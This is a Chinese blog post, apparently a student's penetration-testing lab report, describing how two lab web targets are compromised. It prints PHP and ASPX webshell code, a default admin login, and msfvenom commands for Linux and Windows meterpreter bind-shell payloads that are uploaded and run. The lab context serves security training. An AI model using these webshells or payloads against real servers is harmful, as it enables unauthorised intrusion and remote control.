渗透实验三--远程控制

本文介绍了在Kalilinux环境中使用msf和webshell工具进行正向远程控制的过程,包括在Web系统后台写入一句话木马,通过中国蚁剑连接并利用msfvenom生成木马。实验展示了如何在Linux和Windows环境下执行操作并提升权限。
摘要由CSDN通过智能技术生成

实验原理:在Kali linux中生成一个被控端,这个远程控制是正向的,在攻击机中执行了这个远程控制被控端之后,会在自己的主机上打开一个端口,然后等待靶机的连接,此时的攻击机并不会通知靶机。(如果是反向远程控制被控端就会主动通知)

一、实验目的

1、 学会使用主流的远控软件,比如msf.学会使用webshell管理工具对一句话木马进行连接.

二、实验任务

1、进入web系统后台后写入一句话木马,然后用中国蚁剑进行连接

2、用中国蚁剑进行连接后,使用msf进行远控

三、实验环境

四、实验过程和实验结果

广诚在线视频 10.100.0.99

1.御剑扫描

2.发现敏感文件,使用火狐浏览器修复文字编码,修复后如图:

3.去登录后台

4.成功进入后台

5.找到工具--模板管理--编辑

6.这里在首页,写入一句话木马<?php @eval($_POST['x']);?>

7.然后使用中国蚁剑右键然后添加数据URL对应木马得地址,连接密码就是POST提交的参数

8.成功添加

9.然后制作msf正向木马

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=13777 -f elf > linuxshell

10.生成后找到那个木马,然后使用中国蚁剑上传msf正向木马,上传成功后运行

12.然后用msf连接,成功连接

14.这里不是最高权限

广诚小学 10.100.0.49

1.老规矩进入后台

administrator

administrator

2.找到专题管理,编辑:

记得提交

<%

System. IO.StreamWriter ow=new System. IO.StreamWriter(Server.MapPath("xx.aspx"),false);

ow.Write("<%@ Page Language=\"Jscript\"%\><%eval(Request. Item[\"chopper\"],\"unsafe\");%\>");

ow.Close();

%>

3.然后点击2010专题111,跳转之后:

4.中国蚁剑进行连接

5.制作msf正向木马

msfvenom -p windows/meterpreter/bind_tcp LPORT=8989 -f exe -o flash.exe

6上传木马到 C:/WINDOWS/Temp/ 目录下,切换目录,运行木马

7.运行后成功拿到权限

五、实验总结

总结:通过本次实验,我掌握了如何用中国蚁剑进行连接靶机后,利用msfvenom命令生成远程控制的被控端;理解了msfvenom命令中各参数的应用,如:-p  指定需要使用的payload(攻击荷载)。-f 指定输出格式,exe、elf...等。-o  输出的payload文件的保存位置。同时还明白了怎么在kali linux启动主控端,怎么监听来自感染了被控端的通信,通过实践促进了前面理论知识的吸收,收获颇丰。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值